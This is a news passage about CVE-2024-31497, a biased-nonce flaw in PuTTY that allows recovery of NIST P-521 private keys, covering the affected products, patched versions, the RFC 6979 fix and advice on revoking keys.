he maintainers of PuTTY Secure Shell (SSH) and Telnet client have issued a warning to users regarding a critical vulnerability affecting versions 0.68 through 0.80. This flaw could potentially lead to the complete recovery of NIST P-521 (ecdsa-sha2-nistp521) private keys.
The vulnerability, designated as CVE-2024-31497, was discovered by researchers Fabian Bäumer and Marcus Brinkmann from Ruhr University Bochum.
PuTTY project stated in an advisory that the vulnerability’s impact is on compromising the private key. With access to a few dozen signed messages and the public key, an attacker can gather enough information to recover the private key, allowing them to forge signatures as if they were the legitimate user. This could potentially grant unauthorized access to servers authenticated using the compromised key.
However, to obtain the necessary signatures, an attacker would need to compromise the server where the key is utilized for authentication.
Bäumer explained on the Open Source Software Security (oss-sec) mailing list that the flaw arises from biased ECDSA cryptographic nonces generation. Specifically, the first 9 bits of each ECDSA nonce are set to zero, enabling the recovery of the private key with approximately 60 signatures using advanced techniques.
The impacted products include not only PuTTY but also other software incorporating vulnerable versions:
- FileZilla (versions 3.24.1 to 3.66.5)
- WinSCP (versions 5.9.5 to 6.3.2)
- TortoiseGit (versions 2.4.0.2 to 2.15.0)
- TortoiseSVN (versions 1.10.0 to 1.14.6)
Following responsible disclosure, the issue has been addressed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and TortoiseGit 2.15.0.1. Users of TortoiseSVN are advised to utilize Plink from the latest PuTTY 0.81 release when accessing an SVN repository via SSH until a patch is available.
The resolution involved switching to the RFC 6979 technique for all DSA and ECDSA key types, abandoning the previous method of nonce derivation. While the former approach avoided the need for high-quality randomness, it was susceptible to biased nonces with P-521.
Additionally, ECDSA NIST-P521 keys used with any affected components should be deemed compromised and revoked by removing them from authorized_keys files and equivalents in other SSH servers.
